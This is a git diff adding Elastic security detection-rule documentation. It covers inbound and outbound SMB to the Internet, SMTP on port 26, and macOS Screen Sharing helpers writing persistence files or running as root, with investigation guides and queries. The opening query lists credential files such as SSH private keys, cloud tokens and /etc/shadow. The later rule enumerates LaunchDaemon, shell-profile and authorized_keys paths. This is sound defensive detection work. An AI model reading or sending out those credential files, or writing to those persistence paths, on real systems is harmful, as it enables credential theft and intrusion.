/home/*/.ssh/id_rsa.pub or + /home/*/.ssh/id_ed25519 or + /home/*/.ssh/id_ed25519.pub or + /home/*/.ssh/authorized_keys or + /home/*/.ssh/authorized_keys2 or + /home/*/.ssh/known_hosts or + /home/*/.bash_history or + /root/.aws/credentials or + /root/.aws/config or + /home/*/.aws/credentials or + /home/*/.aws/config or + /home/*/.config/gcloud/credentials.db or + /home/*/.config/gcloud/access_tokens.db or + /home/*/.azure/credentials or + /root/.azure/credentials or + /root/.docker/config.json or + /home/*/.docker/config.json or + /root/.kube/config or + /home/*/.kube/config or + /etc/group or + /etc/passwd or + /etc/shadow or + /etc/gshadow + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Credentials In Files +** ID: T1552.001 +** Reference URL: https://attack.mitre.org/techniques/T1552/001/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: +** Name: Archive Collected Data +** ID: T1560 +** Reference URL: https://attack.mitre.org/techniques/T1560/ +* Sub-technique: +** Name: Archive via Utility +** ID: T1560.001 +** Reference URL: https://attack.mitre.org/techniques/T1560/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-from-the-internet.asciidoc new file mode 100644 index 0000000000..828ded4482 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-from-the-internet.asciidoc @@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-from-the-internet]] +=== SMB (Windows File Sharing) Activity from the Internet + +This rule detects network events that may indicate inbound Windows file sharing (SMB or CIFS) traffic originating from the Internet. SMB should never be directly reachable from the Internet, as it is a primary target for exploitation by threat actors seeking initial access. Inbound SMB from a public IP is a direct precondition for attacks such as EternalBlue (MS17-010) and related SMB remote code execution vulnerabilities. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-corelight.* +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* +* logs-zeek.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml +* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144 + +*Tags*: + +* Tactic: Initial Access +* Domain: Network +* Use Case: Threat Detection +* Data Source: Corelight +* Data Source: Fortinet +* Data Source: PAN-OS +* Data Source: Network Traffic +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SMB (Windows File Sharing) Activity from the Internet* + + +Inbound SMB from a public IP is one of the highest-signal perimeter events observable at a network boundary. SMB (ports 139/445) should never be reachable from the Internet. When it is, it is almost always either a deliberate exposure (misconfiguration) or active exploitation, both of which warrant investigation. Classic attacks in this category include EternalBlue (MS17-010), WannaCry, NotPetya, and subsequent SMB RCE chains. + +This rule uses `new_terms` to suppress repeat scans from the same source, surfacing only the first time each external IP reaches an internal host on SMB ports. + + +*Possible investigation steps* + + +- Identify the destination IP. Determine whether this host has a legitimate reason to expose SMB to the Internet (nearly always: no). Check whether the port was reachable externally due to a misconfigured NAT rule or security group. +- Review firewall allow/deny context alongside the alert. If the session was blocked, the immediate risk is lower, but the exposure is still worth addressing. +- Check the source IP against threat intelligence. Mass-Internet SMB scanning is common and source IPs are frequently tracked in public feeds. +- Correlate with endpoint telemetry on the destination host: look for process creation events, new services, or lateral movement activity that might indicate exploitation succeeded. +- Review patch status of the destination host for MS17-010 and subsequent SMB vulnerabilities. +- Check whether this external IP has been seen targeting other internal hosts or ports in the same timeframe, which would indicate a broader scan or intrusion campaign. + + +*False positive analysis* + + +- Hosts with public IPs that explicitly expose SMB (rare, but occurs in some lab or legacy setups): this is the intended detection; the exposure is itself the finding. Add a per-host exception only after confirming the exposure is authorized and risk-accepted. +- Site-to-site VPN or MPLS setups where a remote office segment routes through a public IP and appears as an external source: confirm with network architecture and add the IP range to the exclusion list if legitimate. + + +*Response and remediation* + + +- If the destination host is reachable from the Internet on port 139 or 445, immediately close the exposure at the firewall or security group level. This is the single most impactful remediation step. +- Isolate the destination host if any signs of compromise exist (unexpected processes, new scheduled tasks, lateral movement alerts). +- Patch the host for MS17-010 and related SMB vulnerabilities if not already current. +- Audit NAT and firewall rules to ensure no other hosts have inadvertent Internet-facing SMB exposure. +- Review the pfSense / network perimeter ruleset to confirm that inbound TCP 139/445 is explicitly denied at the border. + +This rule requires network flow or firewall log data that captures inbound TCP connections with 5-tuple information (source IP, destination IP, destination port). Compatible data sources include: + +- **Elastic Network Traffic** integration (Packetbeat) +- **Corelight** integration (network and SMB telemetry) +- **Fortinet FortiGate** integration (firewall traffic logs) +- **PAN-OS** integration (Palo Alto Networks firewall logs) +- **pfSense** integration (syslog-based firewall flow logs; requires pfSense syslog forwarding enabled) +- **Zeek** integration (SMB-specific log types: `smb_cmd`, `smb_files`, `smb_mapping`) + +For pfSense, ensure the firewall logging rules are configured to log connection events and that the Elastic pfSense integration is forwarding logs to the `logs-pfsense.log-*` data stream. + +==== Setup + + +This rule requires network flow or firewall log data that captures inbound TCP connections with 5-tuple information (source IP, destination IP, destination port). Compatible data sources include: + +Elastic Network Traffic integration (Packetbeat)Corelight integration (network and SMB telemetry)Fortinet FortiGate integration (firewall traffic logs)PAN-OS integration (Palo Alto Networks firewall logs)pfSense integration (syslog-based firewall flow logs; requires pfSense syslog forwarding enabled)Zeek integration (SMB-specific log types: `smb_cmd`, `smb_files`, `smb_mapping`) +For pfSense, ensure the firewall logging rules are configured to log connection events and that the Elastic pfSense integration is forwarding logs to the `logs-pfsense.log-*` data stream. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow or pfsense.log or zeek.smb_cmd or zeek.smb_files or zeek.smb_mapping) or event.category:(network or network_traffic)) + and network.transport:tcp and destination.port:(139 or 445) + and destination.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + and not source.ip:( + 10.0.0.0/8 + or 100.64.0.0/10 + or 127.0.0.0/8 + or 169.254.0.0/16 + or 172.16.0.0/12 + or 192.0.0.0/24 + or 192.0.0.0/29 + or 192.0.0.10/32 + or 192.0.0.170/32 + or 192.0.0.171/32 + or 192.0.0.8/32 + or 192.0.0.9/32 + or 192.0.2.0/24 + or 192.168.0.0/16 + or 192.175.48.0/24 + or 192.31.196.0/24 + or 192.52.193.0/24 + or 192.88.99.0/24 + or 198.18.0.0/15 + or 198.51.100.0/24 + or 203.0.113.0/24 + or 224.0.0.0/4 + or 240.0.0.0/4 + or "::1" + or "FE80::/10" + or "FF00::/8" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-to-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-to-the-internet.asciidoc new file mode 100644 index 0000000000..a93f9619bc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-to-the-internet.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-to-the-internet]] +=== SMB (Windows File Sharing) Activity to the Internet + +This rule detects network events that may indicate the use of Windows file sharing (also called SMB or CIFS) traffic to the Internet. SMB is commonly used within networks to share files, printers, and other system resources amongst trusted systems. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector or for data exfiltration. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* +* logs-zeek.* +* logs-corelight.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Tactic: Initial Access +* Tactic: Exfiltration +* Domain: Network +* Use Case: Threat Detection +* Data Source: Corelight +* Data Source: Fortinet +* Data Source: PAN-OS +* Data Source: Network Traffic +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SMB (Windows File Sharing) Activity to the Internet* + + +SMB, a protocol for sharing files and resources within trusted networks, is vulnerable when exposed to the Internet. Adversaries exploit it for unauthorized access or data theft. The detection rule identifies suspicious SMB traffic from internal IPs to external networks, flagging potential threats by monitoring specific ports and excluding known safe IP ranges. + + +*Possible investigation steps* + + +- Review the source IP address from the alert to identify the internal system initiating the SMB traffic. Check if this IP belongs to a known device or user within the organization. +- Investigate the destination IP address to determine if it is associated with any known malicious activity or if it belongs to a legitimate external service that might require SMB access. +- Analyze network logs to identify any patterns or anomalies in the SMB traffic, such as unusual data transfer volumes or repeated access attempts, which could indicate malicious activity. +- Check for any recent changes or updates on the source system that might explain the SMB traffic, such as new software installations or configuration changes. +- Correlate the alert with other security events or logs, such as authentication logs or endpoint security alerts, to gather additional context and determine if this is part of a broader attack or isolated incident. +- Consult threat intelligence sources to see if there are any known vulnerabilities or exploits related to the SMB traffic observed, which could provide insight into potential attack vectors. + + +*False positive analysis* + + +- Internal testing environments may generate SMB traffic to external IPs for legitimate reasons. Identify and whitelist these IPs to prevent false positives. +- Cloud services or remote backup solutions might use SMB for data transfer. Verify these services and add their IP ranges to the exception list if they are trusted. +- VPN connections can sometimes appear as external traffic. Ensure that VPN IP ranges are included in the list of known safe IPs to avoid misclassification. +- Misconfigured network devices might inadvertently route SMB traffic externally. Regularly audit network configurations and update the rule exceptions to include any legitimate device IPs. +- Some third-party applications may use SMB for updates or data synchronization. Confirm the legitimacy of these applications and exclude their associated IPs from the detection rule. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration. +- Conduct a thorough review of firewall and network configurations to ensure SMB traffic is not allowed to the Internet, and block any unauthorized outbound SMB traffic on ports 139 and 445. +- Perform a comprehensive scan of the isolated system for malware or unauthorized access tools, focusing on identifying any backdoors or persistence mechanisms. +- Reset credentials and review access permissions for any accounts that may have been compromised or used in the suspicious activity. +- Notify the security operations center (SOC) and relevant stakeholders about the incident for further analysis and potential escalation. +- Implement additional monitoring and logging for SMB traffic to detect any future unauthorized attempts to access the Internet. +- Review and update security policies and procedures to prevent similar incidents, ensuring that SMB services are only accessible within trusted network segments. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow or zeek.smb_cmd or zeek.smb_files or zeek.smb_mapping) or event.category:(network or network_traffic)) + and network.transport:tcp and destination.port:(139 or 445) + and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + and not destination.ip:(10.0.0.0/8 + or 100.64.0.0/10 + or 127.0.0.0/8 + or 169.254.0.0/16 + or 172.16.0.0/12 + or 192.0.0.0/24 + or 192.0.0.0/29 + or 192.0.0.10/32 + or 192.0.0.170/32 + or 192.0.0.171/32 + or 192.0.0.8/32 + or 192.0.0.9/32 + or 192.0.2.0/24 + or 192.168.0.0/16 + or 192.175.48.0/24 + or 192.31.196.0/24 + or 192.52.193.0/24 + or 192.88.99.0/24 + or 198.18.0.0/15 + or 198.51.100.0/24 + or 203.0.113.0/24 + or 224.0.0.0/4 + or 240.0.0.0/4 + or "::1" + or "FE80::/10" + or "FF00::/8") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smtp-to-the-internet-on-port-26-tcp.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smtp-to-the-internet-on-port-26-tcp.asciidoc new file mode 100644 index 0000000000..8e390332fb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smtp-to-the-internet-on-port-26-tcp.asciidoc @@ -0,0 +1,165 @@ +[[prebuilt-rule-8-19-32-smtp-to-the-internet-on-port-26-tcp]] +=== SMTP to the Internet on Port 26/TCP + +This rule detects events that may indicate use of SMTP on TCP port 26 from an internal host to an external destination. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems. The rule is scoped to outbound traffic (internal source to external destination) to focus on the command and control and exfiltration use cases, rather than benign internal mail relays or unrelated transit traffic observed by the sensor. + +*Rule type*: query + +*Rule indices*: + +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* +* logs-zeek.* +* logs-corelight.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://unit42.paloaltonetworks.com/unit42-badpatch/ +* https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/ + +*Tags*: + +* Tactic: Command and Control +* Tactic: Exfiltration +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: Corelight +* Data Source: Fortinet +* Data Source: PAN-OS +* Data Source: Network Traffic +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 114 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SMTP to the Internet on Port 26/TCP* + + +SMTP, typically operating on port 25, is crucial for email transmission. However, port 26 is often used to avoid conflicts or restrictions on port 25. Adversaries exploit this by using port 26 for covert command and control, as seen with the BadPatch malware. The detection rule identifies suspicious SMTP activity on port 26 originating from an internal host to an external destination, helping to uncover potential command and control or exfiltration while suppressing benign internal mail traffic. + + +*Possible investigation steps* + + +- Review the network traffic logs to identify any unusual patterns or anomalies associated with TCP port 26, focusing on the event.dataset fields such as network_traffic.flow or zeek.smtp. +- Analyze the source and destination IP addresses involved in the alert to determine if they are known or associated with any previous suspicious activities. +- Check for any additional alerts or logs related to the same source or destination IP addresses to identify potential patterns or repeated attempts of communication on port 26. +- Investigate the context of the communication by examining the payload data, if available, to identify any indicators of compromise or malicious content. +- Correlate the findings with threat intelligence sources to determine if the IP addresses or domains are associated with known threat actors or malware, such as BadPatch. +- Assess the risk and impact on the affected systems by determining if any sensitive data or critical systems are involved in the communication on port 26. + + +*False positive analysis* + + +- Legitimate mail transfer agents may use port 26 to avoid conflicts with port 25. Identify these agents and create exceptions in the detection rule to prevent unnecessary alerts. +- Some network configurations might reroute SMTP traffic to port 26 for load balancing or security reasons. Verify these configurations and whitelist known IP addresses or domains to reduce false positives. +- Internal testing or development environments might use port 26 for non-malicious purposes. Document these environments and exclude their traffic from triggering alerts. +- Certain email service providers may use port 26 as an alternative to port 25. Confirm these providers and adjust the rule to recognize their traffic as benign. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further command and control communication via port 26. +- Conduct a thorough scan of the isolated system using updated antivirus and anti-malware tools to identify and remove the BadPatch malware or any other malicious software. +- Review and analyze network logs to identify any other systems that may have communicated with the same command and control server, and isolate those systems as well. +- Change all passwords and credentials that may have been compromised or accessed by the affected system to prevent unauthorized access. +- Apply security patches and updates to the affected system and any other vulnerable systems to mitigate exploitation by similar threats. +- Monitor network traffic for any further suspicious activity on port 26 and other non-standard ports, adjusting firewall rules to block unauthorized SMTP traffic. +- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and to ensure comprehensive threat eradication. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset: (fortinet_fortigate.log or network_traffic.flow or zeek.smtp) or event.category:(network or network_traffic)) and + network.transport:tcp and destination.port:26 and + source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and + not destination.ip:(10.0.0.0/8 + or 100.64.0.0/10 + or 127.0.0.0/8 + or 169.254.0.0/16 + or 172.16.0.0/12 + or 192.0.0.0/24 + or 192.0.0.0/29 + or 192.0.0.10/32 + or 192.0.0.170/32 + or 192.0.0.171/32 + or 192.0.0.8/32 + or 192.0.0.9/32 + or 192.0.2.0/24 + or 192.168.0.0/16 + or 192.175.48.0/24 + or 192.31.196.0/24 + or 192.52.193.0/24 + or 192.88.99.0/24 + or 198.18.0.0/15 + or 198.51.100.0/24 + or 203.0.113.0/24 + or 224.0.0.0/4 + or 240.0.0.0/4 + or "::1" + or "FE80::/10" + or "FF00::/8") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Mail Protocols +** ID: T1071.003 +** Reference URL: https://attack.mitre.org/techniques/T1071/003/ +* Technique: +** Name: Non-Standard Port +** ID: T1571 +** Reference URL: https://attack.mitre.org/techniques/T1571/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc new file mode 100644 index 0000000000..03e86b7091 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc @@ -0,0 +1,194 @@ +[[prebuilt-rule-8-19-32-ssfilecopyreceiver-writing-to-common-persistence-locations]] +=== SSFileCopyReceiver Writing to Common Persistence Locations + +Identifies the macOS Screen Sharing file copy helper SSFileCopyReceiver creating or modifying files in common persistence locations, including system-wide and per-user LaunchDaemons/LaunchAgents, shell profiles, SSH authorized_keys, cron tabs, and hidden paths under root's home directory. SSFileCopyReceiver performs file writes with root authority on behalf of a remote viewer.Pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400) abuses this write primitive to establish persistence; observed in-the-wild activity dropped LaunchDaemons and modified shell startup files to run a cryptocurrency miner as root. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.huntress.com/blog/macos-screen-sharing-rce-patched +* https://nvd.nist.gov/vuln/detail/CVE-2026-65400 +* https://support.apple.com/en-us/HT201222 + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SSFileCopyReceiver Writing to Common Persistence Locations* + + +This rule spots the macOS Screen Sharing file copy helper writing into locations that commonly grant persistence, such as launch items, shell startup files, SSH access files, scheduled task tabs, and hidden directories under root’s home. It matters because this helper performs writes as root for a remote session, so an attacker can exploit Screen Sharing and drop a LaunchDaemon plist or alter .zshrc to start a miner or backdoor every boot or login. + + +*Possible investigation steps* + + +- Review the exact contents and recent versions of the written plist, shell startup file, cron tab, hidden root file, or SSH key file for persistence logic such as RunAtLoad or KeepAlive settings, embedded download commands, unexpected SSH public keys, or references to miner, shell, or staging paths. +- Correlate the file write time with Screen Sharing and VNC access evidence in Unified Logs, authentication records, and inbound network activity to determine whether the change aligns with an approved remote support session or an unsolicited access attempt consistent with exploitation. +- Confirm whether the persistence has executed by examining loaded launchd jobs, recent root-level child processes, and any binaries or scripts referenced by the modified artifact, prioritizing unknown executables, curl or bash chains, and long-running resource-intensive processes. +- Validate the dropped or referenced payloads by collecting hashes, code-signing and notarization status, ownership and permissions, and comparing them to known-good administration tools, approved software, and recent change tickets. +- Scope impact and remediate by hunting fleet-wide for the same plist labels, SSH keys, file hashes, payload paths, and Screen Sharing write patterns, then isolate affected hosts, remove unauthorized persistence, revoke added access, and update or disable exposed Screen Sharing services until patched. + + +*False positive analysis* + + +- A legitimate administrator using macOS Screen Sharing may copy an approved LaunchDaemon or LaunchAgent plist during remote maintenance or software rollout; verify the session was expected and that the plist label, referenced executable, ownership, and signing details match authorized system changes. +- A user support session can legitimately update a shell profile or SSH authorized_keys file to restore access or set environment defaults; confirm the request with the user or admin and review the added commands or keys to ensure they belong to known accounts and do not launch unexpected binaries. + + +*Related Rules* + + +- SSFileCopySender Executed as Root - e54c3f36-e243-402d-9d44-8f7349eb8c88 + + +*Response and remediation* + + +- Isolate the affected Mac from the network, stop any malicious launchd job, miner, or shell started from the newly written LaunchDaemon, LaunchAgent, shell profile, cron tab, hidden root file, or added SSH key, and preserve the modified files and referenced payloads as evidence. +- Remove attacker persistence by deleting unauthorized plist files from /Library/LaunchDaemons or LaunchAgents, reverting changes to .zshrc, .bash_profile, and other startup files, removing unapproved entries from authorized_keys and /var/at/tabs, and unloading any matching launchd services. +- Restore the host to a known-good state by replacing altered configuration files from a trusted backup or gold image, reinstalling any trojanized binaries referenced by the persistence item, and validating ownership, permissions, and code-signing on the restored files. +- Escalate to incident response immediately if the same plist label, SSH public key, payload hash, or Screen Sharing write pattern is found on additional systems, if root-level processes continue after cleanup, or if you identify signs of credential theft or lateral movement. +- Harden the environment by patching or disabling Screen Sharing where it is not required, restricting remote management exposure with firewall and access controls, rotating credentials and SSH keys that may have been added or abused, and monitoring for new writes to LaunchDaemons, shell profiles, cron tabs, and hidden paths under root’s home. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-* METADATA _id, _index, _version +| WHERE host.os.type == "macos" + AND event.type != "deletion" + AND process.name == "SSFileCopyReceiver" + AND ( + file.path LIKE "/Library/LaunchDaemons/*.plist" + OR file.path LIKE "/Library/LaunchAgents/*.plist" + OR file.path LIKE "/Users/*/Library/LaunchAgents/*.plist" + OR file.path LIKE "/private/var/*/Library/LaunchAgents/*.plist" + OR file.name IN (".zshenv", ".zshrc", ".zprofile", ".zlogin", ".bashrc", ".bash_profile", ".bash_login", ".profile", "config.fish", "environment.plist") + OR file.path LIKE "/Users/*/.ssh/authorized_keys" + OR file.path LIKE "/private/var/root/.ssh/authorized_keys" + OR file.path LIKE "/private/etc/ssh/sshd_config*" + OR file.path LIKE "/private/var/at/tabs/*" + OR file.path LIKE "/var/at/tabs/*" + OR file.path LIKE "/private/var/root/.*/*" + OR file.path LIKE "/var/root/.*/*" + OR file.path LIKE "/private/var/root/.*" + OR file.path LIKE "/var/root/.*" + ) +| KEEP _id, _index, _version, + @timestamp, host.name, host.id, user.id, user.name, process.name, + event.action, event.type, file.path, file.name, data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Launch Agent +** ID: T1543.001 +** Reference URL: https://attack.mitre.org/techniques/T1543/001/ +* Sub-technique: +** Name: Launch Daemon +** ID: T1543.004 +** Reference URL: https://attack.mitre.org/techniques/T1543/004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Unix Shell Configuration Modification +** ID: T1546.004 +** Reference URL: https://attack.mitre.org/techniques/T1546/004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: SSH Authorized Keys +** ID: T1098.004 +** Reference URL: https://attack.mitre.org/techniques/T1098/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopysender-executed-as-root.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopysender-executed-as-root.asciidoc new file mode 100644 index 0000000000..7b50c8be35 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopysender-executed-as-root.asciidoc @@ -0,0 +1,174 @@ +[[prebuilt-rule-8-19-32-ssfilecopysender-executed-as-root]] +=== SSFileCopySender Executed as Root + +Identifies execution of the macOS Screen Sharing file-copy helper SSFileCopySender with root UID/GID attributes (0 80). Under the native Apple authentication path this helper runs in the connecting user's context; execution as root is anomalous and consistent with pre-authentication exploitation of the Screen Sharing service (CVE-2026-65400), where a flawed SRP validation path lets an unauthenticated attacker reach privileged file operations. Note that the 0/80 UID/GID pair reflects only initial exploitation attempts and can be evaded once an attacker enumerates another local account. It is advisable to treat this as a tripwire and pair it with the SSFileCopyReceiver Writing to Common Persistence Locations rule coverage. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.huntress.com/blog/macos-screen-sharing-rce-patched +* https://nvd.nist.gov/vuln/detail/CVE-2026-65400 +* https://support.apple.com/en-us/HT201222 + 